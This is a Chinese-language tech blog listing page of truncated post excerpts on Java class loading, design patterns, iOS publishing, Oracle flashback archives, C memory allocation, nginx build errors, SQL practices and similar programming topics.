    java类加载机制 1.java类加载器的树状结构 引导类加载器 ^ | 扩展类加载器 ^ | 系统类加载器 java使用代理模式来完成类加载,java的类加载器也有类似于继承的关系,引导类是最顶层的加载器,它是所有类的根加载器,它负责加载java核心库。当一个类加载器接到装载类到虚拟机的请求时,通常会代理给父类加载器,若已经是根加载器了,就自己完成加载。 虚拟机区分一个Cla
  • 动态添加文本框 BreakingBad 文本框
      <script>     var num=1; function AddInput() {      var str="";     str+="<input 
  • 读《研磨设计模式》-代码笔记-单例模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ public class Singleton { } /* * 懒汉模式。注意,getInstance如果在多线程环境中调用,需要加上synchronized,否则存在线程不安全问题 */ class LazySingleton
  • iOS应用打包发布常见问题 chenhbc iosiOS发布iOS上传iOS打包
    这个月公司安排我一个人做iOS客户端开发,由于急着用,我先发布一个版本,由于第一次发布iOS应用,期间出了不少问题,记录于此。   1、使用Application Loader 发布时报错:Communication error.please use diagnostic mode to check connectivity.you need to have outbound acc
  • 工作流复杂拓扑结构处理新思路 comsci 设计模式工作算法企业应用OO
    我们走的设计路线和国外的产品不太一样,不一样在哪里呢?  国外的流程的设计思路是通过事先定义一整套规则(类似XPDL)来约束和控制流程图的复杂度(我对国外的产品了解不够多,仅仅是在有限的了解程度上面提出这样的看法),从而避免在流程引擎中处理这些复杂的图的问题,而我们却没有通过事先定义这样的复杂的规则来约束和降低用户自定义流程图的灵活性,这样一来,在引擎和流程流转控制这一个层面就会遇到很
  • oracle 11g新特性Flashback data archive daizj oracle
    1. 什么是flashback data archive Flashback data archive是oracle 11g中引入的一个新特性。Flashback archive是一个新的数据库对象,用于存储一个或多表的历史数据。Flashback archive是一个逻辑对象,概念上类似于表空间。实际上flashback archive可以看作是存储一个或多个表的所有事务变化的逻辑空间。
  • 多叉树:2-3-4树 dieslrae
        平衡树多叉树,每个节点最多有4个子节点和3个数据项,2,3,4的含义是指一个节点可能含有的子节点的个数,效率比红黑树稍差.一般不允许出现重复关键字值.2-3-4树有以下特征:     1、有一个数据项的节点总是有2个子节点(称为2-节点)     2、有两个数据项的节点总是有3个子节点(称为3-节
  • C语言学习七动态分配 malloc的使用 dcj3sjt126com clanguagemalloc
    /* 2013年3月15日15:16:24 malloc 就memory(内存) allocate(分配)的缩写 本程序没有实际含义,只是理解使用 */ # include <stdio.h> # include <malloc.h> int main(void) { int i = 5; //分配了4个字节 静态分配 int * p
  • Objective-C编码规范[译] dcj3sjt126com 代码规范
      原文链接 : The official raywenderlich.com Objective-C style guide 原文作者 : raywenderlich.com Team 译文出自 : raywenderlich.com Objective-C编码规范 译者 : Sam Lau
  • 0.性能优化-目录 frank1234 性能优化
    从今天开始笔者陆续发表一些性能测试相关的文章,主要是对自己前段时间学习的总结,由于水平有限,性能测试领域很深,本人理解的也比较浅,欢迎各位大咖批评指正。 主要内容包括: 一、性能测试指标 吞吐量、TPS、响应时间、负载、可扩展性、PV、思考时间 http://frank1234.iteye.com/blog/2180305 二、性能测试策略 生产环境相同 基准测试 预热等 htt
  • Java父类取得子类传递的泛型参数Class类型 happyqing java泛型父类子类Class
      import java.lang.reflect.ParameterizedType; import java.lang.reflect.Type; import org.junit.Test; abstract class BaseDao<T> { public void getType() { //Class<E> clazz =
  • 跟我学SpringMVC目录汇总贴、PDF下载、源码下载 jinnianshilongnian springMVC
      ----广告-------------------------------------------------------------- 网站核心商详页开发 掌握Java技术,掌握并发/异步工具使用,熟悉spring、ibatis框架; 掌握数据库技术,表设计和索引优化,分库分表/读写分离; 了解缓存技术,熟练使用如Redis/Memcached等主流技术; 了解Ngin
  • the HTTP rewrite module requires the PCRE library 流浪鱼 rewrite
    ./configure: error: the HTTP rewrite module requires the PCRE library. 模块依赖性Nginx需要依赖下面3个包 1. gzip 模块需要 zlib 库 ( 下载: http://www.zlib.net/ ) 2. rewrite 模块需要 pcre 库 ( 下载: http://www.pcre.org/ ) 3. s
  • 第12章 Ajax(中) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Optimize query with Query Stripping in Web Intelligence blueoxygen BO
    http://wiki.sdn.sap.com/wiki/display/BOBJ/Optimize+query+with+Query+Stripping+in+Web+Intelligence and a very straightfoward video http://www.sdn.sap.com/irj/scn/events?rid=/library/uuid/40ec3a0c-936
  • Java开发者写SQL时常犯的10个错误 tomcat_oracle javasql
    1、不用PreparedStatements   有意思的是,在JDBC出现了许多年后的今天,这个错误依然出现在博客、论坛和邮件列表中,即便要记住和理解它是一件很简单的事。开发者不使用PreparedStatements的原因可能有如下几个:   他们对PreparedStatements不了解   他们认为使用PreparedStatements太慢了   他们认为写Prepar
  • 世纪互联与结盟有感 阿尔萨斯
    10月10日,世纪互联与(Foxcon)签约成立合资公司,有感。 全球电子制造业巨头(全球500强企业)与世纪互联共同看好IDC、云计算等业务在中国的增长空间,双方迅速果断出手,在资本层面上达成合作,此举体现了全球电子制造业巨头对世纪互联IDC业务的欣赏与信任,另一方面反映出世纪互联目前良好的运营状况与广阔的发展前景。 众所周知,精于电子产品制造(世界第一),对于世纪互联而言,能够与结盟
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他